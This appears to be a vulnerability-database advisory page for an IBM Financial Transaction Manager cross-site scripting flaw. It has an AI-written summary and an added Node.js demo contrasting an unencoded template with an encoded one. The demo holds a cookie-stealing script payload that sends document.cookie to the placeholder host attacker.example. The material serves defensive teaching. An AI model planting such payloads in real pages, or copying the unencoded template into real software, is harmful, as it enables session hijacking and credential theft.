VYPR
Medium severity (CVSS 6.1) · NVD Advisory · Published Feb 17, 2026 · Updated Apr 15, 2026

CVE-2025-33135

Description

IBM Financial Transaction Manager for ACH Services and Check Services for Multi-Platform 3.0.0.0 through 3.0.5.4 Interim Fix 027 (IBM Financial Transaction Manager for Check Services v3, Multiplatforms) is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

IBM Financial Transaction Manager for ACH and Check Services (Multi-Platform) 3.0.0.0 through 3.0.5.4 IF027 is vulnerable to cross-site scripting that lets an unauthenticated attacker embed JavaScript in the Web UI, potentially disclosing credentials within a trusted session.

Vulnerability Overview

IBM Financial Transaction Manager (FTM) for ACH Services and Check Services for Multi-Platform versions 3.0.0.0 through 3.0.5.4 Interim Fix 027 contain a cross-site scripting (XSS) vulnerability in the Web UI. The flaw is improper neutralization of user-controlled input during web page generation, the pattern CWE-79 describes: untrusted data reaches the rendered page without adequate validation or output encoding, so an attacker can inject arbitrary JavaScript into the application's interface.

Attack Surface and Prerequisites

An unauthenticated remote attacker can exploit this vulnerability without prior access to the system. The attack vector is network-based and requires no privileges, but it does require user interaction: a victim with an active FTM session must load the crafted link or page. The description does not identify the vulnerable component; as with most XSS in this kind of application, the likely location is a page where user-supplied data is reflected or stored and later displayed without encoding, such as error messages, transaction details, or configuration pages.
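To make the failure mode in the two paragraphs above concrete, here is an added example that is not IBM's code and is not taken from the advisory: a hypothetical error page that echoes a user-supplied transaction ID, rendered first without output encoding and then with context-aware encoding, plus a crude check that counts tags the template did not contain. The template, the transaction-ID parameter, the attacker.example host and the payload are all constructed for the demonstration. Node.js:

```javascript
// Added example (not IBM FTM code): the defect class described above, shown as a
// hypothetical error page that echoes a user-supplied transaction ID, first
// without and then with context-aware output encoding. Runs under Node.js.

// Encode for HTML text and double-quoted attribute contexts. Assumes the value
// is never placed inside <script>, a URL, or CSS, which need different encoders.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the untrusted value is concatenated straight into the page, so a
// value containing markup becomes markup (hypothetical template).
function renderErrorVulnerable(txnId) {
  return `<div class="error" data-txn="${txnId}">Transaction ${txnId} not found</div>`;
}

// Hardened: same template, but every insertion point is encoded for its context
// (HTML text and a double-quoted attribute, both covered by encodeForHtml).
function renderErrorHardened(txnId) {
  const safe = encodeForHtml(txnId);
  return `<div class="error" data-txn="${safe}">Transaction ${safe} not found</div>`;
}

// Check used by the demo: count tags the template did not contain. The template
// has exactly one <div> and one </div>; any other tag came from the input.
function injectedTagCount(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.filter((t) => !/^<\/?div\b/.test(t)).length;
}

// Constructed payload of the kind an attacker would plant to steal the session:
// it closes the attribute, then adds a script that ships document.cookie to an
// attacker-controlled host (attacker.example is a placeholder).
const DEMO_PAYLOAD =
  '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

function demo(payload = DEMO_PAYLOAD) {
  const vulnerable = renderErrorVulnerable(payload);
  const hardened = renderErrorHardened(payload);
  return {
    vulnerable,
    hardened,
    injectedInVulnerable: injectedTagCount(vulnerable),
    injectedInHardened: injectedTagCount(hardened),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('vulnerable :', r.vulnerable);
  console.log('hardened   :', r.hardened);
  console.log(`injected tags: vulnerable=${r.injectedInVulnerable} hardened=${r.injectedInHardened}`);
}
```

Run it with node to see both renderings side by side. The encoder covers HTML text and double-quoted attribute contexts only; a value inserted into a script block, a URL, or a CSS context needs a different encoder, which is why the rule is to encode for the exact context of each insertion point rather than to filter input once on the way in.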

Impact

Successful exploitation runs attacker-controlled JavaScript in the victim's browser within the trusted FTM origin. This can lead to credential disclosure, session hijacking, or actions performed through the victim's session. The CVSS v3 base score of 6.1 (Medium) reflects low confidentiality and integrity impact for a network-reachable, low-complexity attack that needs no privileges but does require user interaction [1].

Mitigation Status

IBM's security advisory (reference [1]) is the authoritative remediation guidance. Because the affected range runs through 3.0.5.4 Interim Fix 027 inclusive, applying Interim Fix 027 does not remediate the issue; the fix is the later interim fix or release named in the advisory, and users should upgrade to it as soon as possible. No workarounds are mentioned, and there is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog at the time of writing.

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: not yet available

References: 1

News mentions: 0 (no linked articles in our index yet)